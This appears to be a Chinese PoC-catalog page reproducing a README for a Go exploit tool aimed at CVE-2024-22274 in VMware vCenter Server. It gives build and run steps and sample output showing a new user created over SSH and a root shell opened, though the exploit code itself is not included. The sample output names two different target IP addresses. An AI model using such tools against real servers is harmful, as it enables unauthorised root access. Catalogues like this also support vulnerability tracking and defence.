POC详情: c9955679bef94d8eb74d4894541c2e3919776add

来源
https://github.com/Mustafa1986/CVE-2024-22274-RCE
关联漏洞
标题: VMware vCenter Server 安全漏洞 (CVE-2024-22274)
描述:VMware vCenter Server是美国威睿(VMware)公司的一套服务器和虚拟化管理软件。该软件提供了一个用于管理VMware vSphere环境的集中式平台,可自动实施和交付虚拟基础架构。 VMware vCenter Server存在安全漏洞,该漏洞源于存在经过身份验证的远程代码执行漏洞,攻击者可能会利用此漏洞在底层操作系统上运行任意命令。
介绍
# CVE-2024-22274 Exploit

This repository contains an exploit for CVE-2024-22274. The exploit creates a new user on a remote machine via SSH and then provides a root shell.

## Requirements

- Go (Golang) installed on your machine. You can download it from [here](https://golang.org/dl/).
- A remote machine with SSH access.

## Compilation

1. Clone the repository:
    ```sh
    git clone https://github.com/Mustafa1986/CVE-2024-22274-RCE.git
    cd CVE-2024-22274-RCE
    ```

2. Install the required packages:
    ```sh
    go mod init cve-2024-22274
    go mod tidy
    go get golang.org/x/crypto/ssh
    go get golang.org/x/term
    ```

3. Compile the Go program:
    ```sh
    go build -o cve-2024-22274-rce main.go
    ```

## Usage

1. Run the compiled program:
    ```sh
    ./cve-2024-22274-rce
    ```

2. Follow the prompts:
    - Enter the host address of the target machine.
    - Enter the SSH port (default is 22).
    - Enter the SSH username of the target machine.
    - Enter the SSH password of the target machine.
    - Enter the new username you want to create.
    - Enter the new password for the new user.

3. After the user is created, you will get a root shell on the target machine. You can execute commands as the new user.

## Example

```sh
[+] CVE-2024-22274 by Mustafa
[-] Enter host address: 192.168.0.100
[-] Enter port (default 22): 22
[-] Enter SSH username: root
[-] Enter SSH password: ********
[-] Enter new username: newuser
[-] Enter new password: ********
[+] Connected to 192.168.1.100 via SSH
[+] Created user newuser on 192.168.1.100
[+] Connected user newuser via SSH
[+] Root-shell# (type 'exit' to quit): 
```
Disclaimer
This code is for educational purposes only. Use it responsibly and only on systems you have permission to test.

License
This project is licensed under the MIT License - see the LICENSE file for details.
文件快照

 [4.0K]  /data/pocs/c9955679bef94d8eb74d4894541c2e3919776add
├── [4.9M]  cve-2024-22274-rce
├── [ 148]  go.mod
├── [ 467]  go.sum
├── [3.2K]  main.go
└── [1.8K]  README.md

0 directories, 5 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。